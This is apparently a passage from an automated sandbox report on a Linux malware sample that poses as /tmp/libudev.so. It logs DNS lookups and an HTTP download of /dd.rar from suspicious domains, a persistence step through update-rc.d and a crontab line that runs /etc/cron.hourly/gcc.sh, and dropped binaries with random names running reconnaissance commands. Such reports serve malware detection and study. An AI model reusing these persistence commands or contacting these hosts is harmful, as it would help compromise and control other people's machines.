Jul 9, 2022 18:43:50.412745953 CEST	53	58098	8.8.8.8	192.168.2.23
Jul 9, 2022 18:43:50.433160067 CEST	45258	53	192.168.2.23	8.8.8.8
Jul 9, 2022 18:43:50.451155901 CEST	53	45258	8.8.8.8	192.168.2.23
Jul 9, 2022 18:43:50.451282024 CEST	49627	53	192.168.2.23	8.8.4.4
Jul 9, 2022 18:43:50.470971107 CEST	53	49627	8.8.4.4	192.168.2.23
Jul 9, 2022 18:43:50.471167088 CEST	34748	53	192.168.2.23	8.8.8.8
Jul 9, 2022 18:43:50.489026070 CEST	53	34748	8.8.8.8	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 9, 2022 18:43:50.385700941 CEST	192.168.2.23	8.8.8.8	0xd253	Standard query (0)	www1.gggatat456.com	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.393372059 CEST	192.168.2.23	8.8.8.8	0xf3f7	Standard query (0)	p5.lpjulidny7.com	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.433160067 CEST	192.168.2.23	8.8.8.8	0x8a80	Standard query (0)	p5.dddgata789.com	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.451282024 CEST	192.168.2.23	8.8.4.4	0xe320	Standard query (0)	p5.dddgata789.com	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.471167088 CEST	192.168.2.23	8.8.8.8	0x813b	Standard query (0)	ppp.xxxatat456.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 9, 2022 18:43:50.405038118 CEST	8.8.8.8	192.168.2.23	0xd253	No error (0)	www1.gggatat456.com		54.36.15.99	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.451155901 CEST	8.8.8.8	192.168.2.23	0x8a80	Name error (3)	p5.dddgata789.com	none	none	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.470971107 CEST	8.8.4.4	192.168.2.23	0xe320	Name error (3)	p5.dddgata789.com	none	none	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.489026070 CEST	8.8.8.8	192.168.2.23	0x813b	No error (0)	ppp.xxxatat456.com		54.36.15.96	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.489026070 CEST	8.8.8.8	192.168.2.23	0x813b	No error (0)	ppp.xxxatat456.com		79.137.1.132	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.489026070 CEST	8.8.8.8	192.168.2.23	0x813b	No error (0)	ppp.xxxatat456.com		46.105.84.190	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.489026070 CEST	8.8.8.8	192.168.2.23	0x813b	No error (0)	ppp.xxxatat456.com		79.137.1.134	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.489026070 CEST	8.8.8.8	192.168.2.23	0x813b	No error (0)	ppp.xxxatat456.com		46.105.84.188	A (IP address)	IN (0x0001)
Jul 9, 2022 18:43:50.489026070 CEST	8.8.8.8	192.168.2.23	0x813b	No error (0)	ppp.xxxatat456.com		54.36.15.98	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www1.gggatat456.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	57652	54.36.15.99	80

Timestamp	kBytes transferred	Direction	Data
Jul 9, 2022 18:43:50.434118032 CEST	1	OUT	GET /dd.rar HTTP/1.1 Accept: / Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322) Host: www1.gggatat456.com Connection: Keep-Alive

System Behavior

Analysis Process: libudev.so PID: 6230, Parent PID: 6124

General

Start time:	18:43:48
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	/tmp/libudev.so
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6231, Parent PID: 6230

General

Start time:	18:43:48
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6232, Parent PID: 6231

General

Start time:	18:43:48
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6233, Parent PID: 6232

General

Start time:	18:43:48
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6234, Parent PID: 6231

General

Start time:	18:43:48
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6235, Parent PID: 6234

General

Start time:	18:43:48
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: update-rc.d PID: 6235, Parent PID: 1860

General

Start time:	18:43:49
Start date:	09/07/2022
Path:	/sbin/update-rc.d
Arguments:	update-rc.d libudev.so defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: update-rc.d PID: 6241, Parent PID: 6235

General

Start time:	18:43:49
Start date:	09/07/2022
Path:	/sbin/update-rc.d
Arguments:	n/a
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: systemctl PID: 6241, Parent PID: 6235

General

Start time:	18:43:49
Start date:	09/07/2022
Path:	/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: libudev.so PID: 6236, Parent PID: 6231

General

Start time:	18:43:49
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: sh PID: 6236, Parent PID: 6231

General

Start time:	18:43:49
Start date:	09/07/2022
Path:	/bin/sh
Arguments:	sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6237, Parent PID: 6236

General

Start time:	18:43:49
Start date:	09/07/2022
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 6237, Parent PID: 6236

General

Start time:	18:43:49
Start date:	09/07/2022
Path:	/bin/sed
Arguments:	sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: libudev.so PID: 6263, Parent PID: 6231

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6264, Parent PID: 6263

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: mljnlxkfff PID: 6264, Parent PID: 6263

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/usr/bin/mljnlxkfff
Arguments:	/usr/bin/mljnlxkfff id 6231
File size:	625878 bytes
MD5 hash:	d750c8beac9f7e938ed3d56311d9b66c

Chronological Activities

Analysis Process: mljnlxkfff PID: 6265, Parent PID: 6264

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/usr/bin/mljnlxkfff
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	d750c8beac9f7e938ed3d56311d9b66c

Chronological Activities

Analysis Process: libudev.so PID: 6266, Parent PID: 6231

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6267, Parent PID: 6266

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: mljnlxkfff PID: 6267, Parent PID: 6266

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/usr/bin/mljnlxkfff
Arguments:	/usr/bin/mljnlxkfff "grep \"A\"" 6231
File size:	625878 bytes
MD5 hash:	d750c8beac9f7e938ed3d56311d9b66c

Chronological Activities

Analysis Process: mljnlxkfff PID: 6270, Parent PID: 6267

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/usr/bin/mljnlxkfff
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	d750c8beac9f7e938ed3d56311d9b66c

Chronological Activities

Analysis Process: libudev.so PID: 6268, Parent PID: 6231

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6269, Parent PID: 6268

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: mljnlxkfff PID: 6269, Parent PID: 6268

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/usr/bin/mljnlxkfff
Arguments:	/usr/bin/mljnlxkfff su 6231
File size:	625878 bytes
MD5 hash:	d750c8beac9f7e938ed3d56311d9b66c

Chronological Activities

Analysis Process: mljnlxkfff PID: 6274, Parent PID: 6269

General

Start time:	18:43:55
Start date:	09/07/2022
Path:	/usr/bin/mljnlxkfff
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	d750c8beac9f7e938ed3d56311d9b66c

Chronological Activities

Analysis Process: libudev.so PID: 6271, Parent PID: 6231

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6272, Parent PID: 6271

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: mljnlxkfff PID: 6272, Parent PID: 6271

General

Start time:	18:43:54
Start date:	09/07/2022
Path:	/usr/bin/mljnlxkfff
Arguments:	/usr/bin/mljnlxkfff "cat resolv.conf" 6231
File size:	625878 bytes
MD5 hash:	d750c8beac9f7e938ed3d56311d9b66c

Chronological Activities

Analysis Process: mljnlxkfff PID: 6276, Parent PID: 6272

General

Start time:	18:43:55
Start date:	09/07/2022
Path:	/usr/bin/mljnlxkfff
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	d750c8beac9f7e938ed3d56311d9b66c

Chronological Activities

Analysis Process: libudev.so PID: 6273, Parent PID: 6231

General

Start time:	18:43:55
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6275, Parent PID: 6273

General

Start time:	18:43:55
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: mljnlxkfff PID: 6275, Parent PID: 6273

General

Start time:	18:43:55
Start date:	09/07/2022
Path:	/usr/bin/mljnlxkfff
Arguments:	/usr/bin/mljnlxkfff ifconfig 6231
File size:	625878 bytes
MD5 hash:	d750c8beac9f7e938ed3d56311d9b66c

Chronological Activities

Analysis Process: mljnlxkfff PID: 6277, Parent PID: 6275

General

Start time:	18:43:55
Start date:	09/07/2022
Path:	/usr/bin/mljnlxkfff
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	d750c8beac9f7e938ed3d56311d9b66c

Chronological Activities

Analysis Process: libudev.so PID: 6280, Parent PID: 6231

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6281, Parent PID: 6280

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: jjfbelholv PID: 6281, Parent PID: 6280

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/usr/bin/jjfbelholv
Arguments:	/usr/bin/jjfbelholv id 6231
File size:	625878 bytes
MD5 hash:	49d50c6d28b847418207973b5aeb45e4

Chronological Activities

Analysis Process: jjfbelholv PID: 6282, Parent PID: 6281

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/usr/bin/jjfbelholv
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	49d50c6d28b847418207973b5aeb45e4

Chronological Activities

Analysis Process: libudev.so PID: 6283, Parent PID: 6231

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6284, Parent PID: 6283

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: jjfbelholv PID: 6284, Parent PID: 6283

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/usr/bin/jjfbelholv
Arguments:	/usr/bin/jjfbelholv whoami 6231
File size:	625878 bytes
MD5 hash:	49d50c6d28b847418207973b5aeb45e4

Chronological Activities

Analysis Process: jjfbelholv PID: 6285, Parent PID: 6284

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/usr/bin/jjfbelholv
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	49d50c6d28b847418207973b5aeb45e4

Chronological Activities

Analysis Process: libudev.so PID: 6286, Parent PID: 6231

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6287, Parent PID: 6286

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: jjfbelholv PID: 6287, Parent PID: 6286

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/usr/bin/jjfbelholv
Arguments:	/usr/bin/jjfbelholv pwd 6231
File size:	625878 bytes
MD5 hash:	49d50c6d28b847418207973b5aeb45e4

Chronological Activities

Analysis Process: jjfbelholv PID: 6288, Parent PID: 6287

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/usr/bin/jjfbelholv
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	49d50c6d28b847418207973b5aeb45e4

Chronological Activities

Analysis Process: libudev.so PID: 6289, Parent PID: 6231

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6290, Parent PID: 6289

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: jjfbelholv PID: 6290, Parent PID: 6289

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/usr/bin/jjfbelholv
Arguments:	/usr/bin/jjfbelholv "sleep 1" 6231
File size:	625878 bytes
MD5 hash:	49d50c6d28b847418207973b5aeb45e4

Chronological Activities

Analysis Process: jjfbelholv PID: 6293, Parent PID: 6290

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/usr/bin/jjfbelholv
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	49d50c6d28b847418207973b5aeb45e4

Chronological Activities

Analysis Process: libudev.so PID: 6291, Parent PID: 6231

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6292, Parent PID: 6291

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: jjfbelholv PID: 6292, Parent PID: 6291

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/usr/bin/jjfbelholv
Arguments:	/usr/bin/jjfbelholv "cd /etc" 6231
File size:	625878 bytes
MD5 hash:	49d50c6d28b847418207973b5aeb45e4

Chronological Activities

Analysis Process: jjfbelholv PID: 6294, Parent PID: 6292

General

Start time:	18:44:00
Start date:	09/07/2022
Path:	/usr/bin/jjfbelholv
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	49d50c6d28b847418207973b5aeb45e4

Chronological Activities

Analysis Process: libudev.so PID: 6298, Parent PID: 6231

General

Start time:	18:44:06
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6299, Parent PID: 6298

General

Start time:	18:44:06
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: trcmbxxcta PID: 6299, Parent PID: 6298

General

Start time:	18:44:06
Start date:	09/07/2022
Path:	/usr/bin/trcmbxxcta
Arguments:	/usr/bin/trcmbxxcta who 6231
File size:	625878 bytes
MD5 hash:	e93ee3f4ded35ceeab60752300a344d0

Chronological Activities

Analysis Process: trcmbxxcta PID: 6300, Parent PID: 6299

General

Start time:	18:44:06
Start date:	09/07/2022
Path:	/usr/bin/trcmbxxcta
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	e93ee3f4ded35ceeab60752300a344d0

Chronological Activities

Analysis Process: libudev.so PID: 6301, Parent PID: 6231

General

Start time:	18:44:06
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6302, Parent PID: 6301

General

Start time:	18:44:06
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: trcmbxxcta PID: 6302, Parent PID: 6301

General

Start time:	18:44:06
Start date:	09/07/2022
Path:	/usr/bin/trcmbxxcta
Arguments:	/usr/bin/trcmbxxcta "sleep 1" 6231
File size:	625878 bytes
MD5 hash:	e93ee3f4ded35ceeab60752300a344d0

Chronological Activities

Analysis Process: trcmbxxcta PID: 6305, Parent PID: 6302

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/usr/bin/trcmbxxcta
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	e93ee3f4ded35ceeab60752300a344d0

Chronological Activities

Analysis Process: libudev.so PID: 6303, Parent PID: 6231

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6304, Parent PID: 6303

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: trcmbxxcta PID: 6304, Parent PID: 6303

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/usr/bin/trcmbxxcta
Arguments:	/usr/bin/trcmbxxcta who 6231
File size:	625878 bytes
MD5 hash:	e93ee3f4ded35ceeab60752300a344d0

Chronological Activities

Analysis Process: trcmbxxcta PID: 6308, Parent PID: 6304

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/usr/bin/trcmbxxcta
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	e93ee3f4ded35ceeab60752300a344d0

Chronological Activities

Analysis Process: libudev.so PID: 6306, Parent PID: 6231

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6307, Parent PID: 6306

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: trcmbxxcta PID: 6307, Parent PID: 6306

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/usr/bin/trcmbxxcta
Arguments:	/usr/bin/trcmbxxcta uptime 6231
File size:	625878 bytes
MD5 hash:	e93ee3f4ded35ceeab60752300a344d0

Chronological Activities

Analysis Process: trcmbxxcta PID: 6311, Parent PID: 6307

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/usr/bin/trcmbxxcta
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	e93ee3f4ded35ceeab60752300a344d0

Chronological Activities

Analysis Process: libudev.so PID: 6309, Parent PID: 6231

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6310, Parent PID: 6309

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: trcmbxxcta PID: 6310, Parent PID: 6309

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/usr/bin/trcmbxxcta
Arguments:	/usr/bin/trcmbxxcta uptime 6231
File size:	625878 bytes
MD5 hash:	e93ee3f4ded35ceeab60752300a344d0

Chronological Activities

Analysis Process: trcmbxxcta PID: 6312, Parent PID: 6310

General

Start time:	18:44:07
Start date:	09/07/2022
Path:	/usr/bin/trcmbxxcta
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	e93ee3f4ded35ceeab60752300a344d0

Chronological Activities

Analysis Process: libudev.so PID: 6315, Parent PID: 6231

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6316, Parent PID: 6315

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: ctwojuywol PID: 6316, Parent PID: 6315

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/usr/bin/ctwojuywol
Arguments:	/usr/bin/ctwojuywol "netstat -antop" 6231
File size:	625878 bytes
MD5 hash:	637b8bb85e23041fe2f4a3767c0e251b

Chronological Activities

Analysis Process: ctwojuywol PID: 6317, Parent PID: 6316

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/usr/bin/ctwojuywol
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	637b8bb85e23041fe2f4a3767c0e251b

Chronological Activities

Analysis Process: libudev.so PID: 6318, Parent PID: 6231

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6319, Parent PID: 6318

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: ctwojuywol PID: 6319, Parent PID: 6318

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/usr/bin/ctwojuywol
Arguments:	/usr/bin/ctwojuywol pwd 6231
File size:	625878 bytes
MD5 hash:	637b8bb85e23041fe2f4a3767c0e251b

Chronological Activities

Analysis Process: ctwojuywol PID: 6320, Parent PID: 6319

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/usr/bin/ctwojuywol
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	637b8bb85e23041fe2f4a3767c0e251b

Chronological Activities

Analysis Process: libudev.so PID: 6321, Parent PID: 6231

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6322, Parent PID: 6321

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: ctwojuywol PID: 6322, Parent PID: 6321

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/usr/bin/ctwojuywol
Arguments:	/usr/bin/ctwojuywol bash 6231
File size:	625878 bytes
MD5 hash:	637b8bb85e23041fe2f4a3767c0e251b

Chronological Activities

Analysis Process: ctwojuywol PID: 6323, Parent PID: 6322

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/usr/bin/ctwojuywol
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	637b8bb85e23041fe2f4a3767c0e251b

Chronological Activities

Analysis Process: libudev.so PID: 6324, Parent PID: 6231

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6325, Parent PID: 6324

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: ctwojuywol PID: 6325, Parent PID: 6324

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/usr/bin/ctwojuywol
Arguments:	/usr/bin/ctwojuywol bash 6231
File size:	625878 bytes
MD5 hash:	637b8bb85e23041fe2f4a3767c0e251b

Chronological Activities

Analysis Process: ctwojuywol PID: 6326, Parent PID: 6325

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/usr/bin/ctwojuywol
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	637b8bb85e23041fe2f4a3767c0e251b

Chronological Activities

Analysis Process: libudev.so PID: 6327, Parent PID: 6231

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6328, Parent PID: 6327

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: ctwojuywol PID: 6328, Parent PID: 6327

General

Start time:	18:44:13
Start date:	09/07/2022
Path:	/usr/bin/ctwojuywol
Arguments:	/usr/bin/ctwojuywol "ifconfig eth0" 6231
File size:	625878 bytes
MD5 hash:	637b8bb85e23041fe2f4a3767c0e251b

Chronological Activities

Analysis Process: ctwojuywol PID: 6331, Parent PID: 6328

General

Start time:	18:44:14
Start date:	09/07/2022
Path:	/usr/bin/ctwojuywol
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	637b8bb85e23041fe2f4a3767c0e251b

Chronological Activities

Analysis Process: libudev.so PID: 6334, Parent PID: 6231

General

Start time:	18:44:19
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: libudev.so PID: 6335, Parent PID: 6334

General

Start time:	18:44:19
Start date:	09/07/2022
Path:	/tmp/libudev.so
Arguments:	n/a
File size:	625867 bytes
MD5 hash:	7dc92a289a05c45d4179a322344ad09c

Chronological Activities

Analysis Process: fsqerkomug PID: 6335, Parent PID: 6334

General

Start time:	18:44:19
Start date:	09/07/2022
Path:	/usr/bin/fsqerkomug
Arguments:	/usr/bin/fsqerkomug ls 6231
File size:	625878 bytes
MD5 hash:	e446fff5f449758979147b09c39cef27

Chronological Activities

Analysis Process: fsqerkomug PID: 6336, Parent PID: 6335

General

Start time:	18:44:19
Start date:	09/07/2022
Path:	/usr/bin/fsqerkomug
Arguments:	n/a
